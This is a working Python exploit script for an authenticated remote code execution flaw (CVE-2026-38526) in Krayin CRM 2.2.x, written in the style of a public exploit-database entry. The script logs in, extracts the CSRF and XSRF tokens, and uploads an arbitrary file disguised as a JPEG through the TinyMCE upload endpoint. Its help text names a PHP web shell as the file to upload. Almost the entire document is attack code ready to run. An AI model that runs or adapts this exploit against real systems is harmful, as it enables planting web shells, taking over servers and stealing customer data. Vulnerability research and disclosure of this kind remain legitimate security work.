# Exploit Title: Krayin CRM v2.2.x - Authenticated Remote Code Execution
# Date: 07/05/2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://krayincrm.com
# Software Link: https://github.com/krayin/laravel-crm
# Version: 2.2.x
# Tested on: Debian
# CVE : CVE-2026-38526
import asyncio
import httpx
from urllib.parse import *
import argparse
from bs4 import BeautifulSoup
import json
async def main(url, user, password, file):
async with httpx.AsyncClient(verify=False) as client:
url_login = urljoin(url, "/admin/login")
upload_url = urljoin(url, "/admin/tinymce/upload")
get_tokens = await client.get(url=url_login)
soup = BeautifulSoup(get_tokens.text, 'html.parser')
_token = soup.find('input').get('value')
login_data = {
"_token": _token,
"email": user,
"password": password
}
login_r = await client.post(url=url_login, data=login_data)
xsrf_token = login_r.cookies.get("XSRF-TOKEN")
headers = {
"X-XSRF-TOKEN": unquote(xsrf_token)
}
with open(file, 'rb') as o_file:
r = await client.post(url=upload_url, files={"file": (o_file.name, o_file, "image/jpeg")}, headers=headers)
if r.status_code == 200:
exploit_url = r.json().get('location')
print(f'[+] File uploaded successfully.\nPath to file: {exploit_url}')
else:
print('[-] File not uploaded.')
parser = argparse.ArgumentParser(description="Exploit for CVE-2026-38526, authenticated file upload.")
parser.add_argument('-t', '--target', required=True, help="Target url. E.g. http://127.0.0.1")
parser.add_argument('-u', '--user', required=True, help="Email.")
parser.add_argument('-p', '--password', required=True, help="Password.")
parser.add_argument('-f', '--file', required=True, help="File to upload (/home/user/shell.php).")
args = parser.parse_args()
if __name__ == '__main__':
asyncio.run(main(args.target, args.user, args.password, args.file))